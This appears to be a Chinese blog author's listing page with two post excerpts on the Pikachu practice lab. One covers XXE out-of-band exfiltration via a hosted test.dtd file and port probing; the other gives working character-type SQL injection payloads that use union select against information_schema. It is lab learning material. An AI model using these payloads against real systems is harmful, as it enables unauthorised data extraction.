pikachu
关注
分享
扫一扫
m0_62094846
这个作者很懒,什么都没留下…
展开
-
pikachu-xxe
然后就能在本地的日志里看到test.txt的内容了(要开访问日志权限)但是这里面返回速度很快的,在网页上测试的时候还是回显很慢,感觉有点问题。但是扫描80端口会快,81会慢,因为80端口开放了。点 response received进行排序。在WWW下保存以test.dtd为名的文件。选择 response received。测试一下是否有xxe漏洞,且是否有回显。把echo $html 注释掉。两个回显都是这样的报错信息。填好数据,然后开始爆破。表示出来,再进行排序。原创 2022-09-19 21:22:18 · 308 阅读 · 0 评论 -
sql-字符型注入
?name='or 1=1 order by 2--+?name='or 1=1 union select 1,2--+其他按联合注入方式?name='or 1=1 union select 1,group_concat(column_name) from information_schema.columns where table_schema='pikachu' and table_name='users'--+?name='or 1=1 union se...原创 2022-01-09 20:42:31 · 297 阅读 · 0 评论